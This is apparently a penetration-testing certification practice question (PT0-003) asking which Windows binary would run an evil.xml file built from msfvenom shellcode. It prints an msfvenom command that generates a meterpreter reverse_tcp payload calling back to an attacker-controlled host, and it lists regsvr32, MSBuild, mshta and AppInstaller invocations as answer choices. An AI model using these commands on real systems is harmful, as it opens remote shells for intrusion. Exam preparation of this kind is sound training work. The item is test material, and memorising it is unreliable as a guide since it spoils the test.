List of questions
Related questions
Question 36 - PT0-003 discussion
A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?
A.
regsvr32 /s /n /u C:\evil.xml
B.
MSBuild.exe C:\evil.xml
C.
mshta.exe C:\evil.xml
D.
AppInstaller.exe C:\evil.xml
Your answer:
0 comments
Sorted by
Leave a comment first